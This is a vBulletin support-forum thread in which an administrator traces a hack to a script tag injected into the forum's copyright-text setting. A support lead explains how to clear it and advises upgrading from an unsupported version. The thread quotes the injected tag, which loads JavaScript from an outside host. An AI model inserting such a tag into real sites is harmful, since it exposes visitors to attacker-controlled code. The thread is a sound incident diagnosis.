Help, I've been hacked

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • Keith A
    New Member
    • Jan 2012
    • 3
    • 3.0.7
    #1

    Help, I've been hacked

    Greetings to all,

    I'm new to the forum and unfortunately, I'm coming to you guys for some help since our forum was just hacked. I am not an expert with vBulletin, but unfortunately those who setup the forum are long gone and I've been trying to figure out things as a go along.

    Anyway, the hack is that an image gets inserted at the bottom of the page through the footer code along with a link to http://clicknetsystem.com/jscript/pixel.js and I'm assuming this is getting run when you refresh the page.

    I have figured out that the code that displays this is in the footer information and when I remove the following section of code, the image is no longer displayed and the java script is no longer being run. Here's the section of code I removed...

    <div class="smallfont" align="center">
    <!-- Do not remove $cronimage or your scheduled tasks will cease to function -->
    $cronimage
    <!-- Do not remove $cronimage or your scheduled tasks will cease to function -->


    $vboptions[copyrighttext]
    </div>
    What I need to know is how to reset whatever the hacker did. It appears to me that I need to either update/change $cronimage or $vboptions[copyrighttext], but I don't know where to start...or if this is the only thing that I need to repair. So I would really appreciate any help you might be able to provide.

    Thanks in advance.
    Tags: None
    • Keith A
      New Member
      • Jan 2012
      • 3
      • 3.0.7
      #2
      Looks like I found where this was injected. It is in the "Site Name/URL/Contract Details" setting group and the field is in the Copyright Text which has been set to...

      "<script src="http://clicknetsystem.com/jscript/pixel.js"></script>"

      So how did this happen in the first place?
      Is there anyway to know what data was in there?
      How do I know if they have done anything else?
      What should I do to prevent this from happening again?


      Thanks.

        Comment

        • Wayne Luke
          vBulletin Technical Support Lead
          • Aug 2000
          • 74078
          #3
          The code you removed from the footer is critical to the operation of vBulletin. It needs to be replaced.

          You need to empty the copyright option.

          If you are actually still using vBulletin 3.0, then your software should be considered insecure and is not supported anymore. We haven't released any 3.0.X updates in over 5 years and no longer check it for security vulnerabilities. There have been dozens of software releases since then and you should plan on upgrading as soon as possible.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

            Comment

            • Keith A
              New Member
              • Jan 2012
              • 3
              • 3.0.7
              #4
              Wayne -- Thanks for the reply and information. I sort of inherited doing the admin for this forum and have been learning as I go. You were exactly right about how to fix the problem and once I removed this, the image is no longer displayed and the java script is not being run. However, I am worried about what else may have been modified. You are also completely correct about upgrading our forum and this is next on my list of things to do.

              One other quick question. I can upgrade for free to 3.6.?, but have to purchase 4.x in order to go to 3.8.7. Should I even bother going to the free 3.6.? or just jump right to 3.8.7 even if it costs to do so?

              BTW, I only removed the code from the footer while I had the forum turned off. I was just trying to figure out what was going on.
              Last edited by Keith A; Tue 17 Jan '12, 2:14pm.

                Comment

                • Wayne Luke
                  vBulletin Technical Support Lead
                  • Aug 2000
                  • 74078
                  #5
                  Looking at the license your forum account is associated with, you can upgrade to 3.6.8 Patch Level 2. Any version higher would require an upgraded license to be purchased for $175.00.

                  Your best option would be 3.8.7 as it is supported under PHP 3.8.5, has hundreds of feature enhancements and bug fixes over 3.0.X and 3.6.8.
                  Translations provided by Google.

                  Wayne Luke
                  The Rabid Badger - a vBulletin Cloud demonstration site.
                  vBulletin 5 API

                    Comment

                    Previous template Next
                    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                    Working...